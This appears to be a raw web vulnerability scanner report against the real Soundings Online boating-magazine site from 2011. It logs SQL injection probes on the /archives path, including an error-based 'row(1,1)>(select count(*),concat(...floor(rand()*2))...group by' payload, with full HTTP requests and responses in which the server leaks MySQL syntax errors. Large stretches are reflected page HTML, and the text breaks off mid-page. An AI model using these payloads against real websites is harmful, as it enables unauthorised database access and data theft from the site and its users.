<base href="http://www.soundingsonline.com/archives/' convert(int,(CHAR(95) CHAR(33) CHAR(64) CHAR(50) CHAR(100) CHAR(105) CHAR(108) CHAR(101) CHAR(109) CHAR(109) CHAR(97))) '" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a><..
- /archives/'AND%201=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

/archives/'AND%201=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

http://www.soundingsonline.com/archives/'AND%201=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR..

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'AND%201=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives/'AND 1=(CHAR(95) CHAR(33) CHAR(64) CHAR(50) CHAR(100) CHAR(105) CHAR(108) CHAR(101) CHAR(109) CHAR(109) CHAR(97)) '" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li>&l..
- /archives/'+(select%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))+'

/archives/'+(select%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))+'

http://www.soundingsonline.com/archives/'+(select%201%20and%20row(1,1)%3E(select%20count(*),concat(C..

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'+(select%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))+'?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives/' (select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront 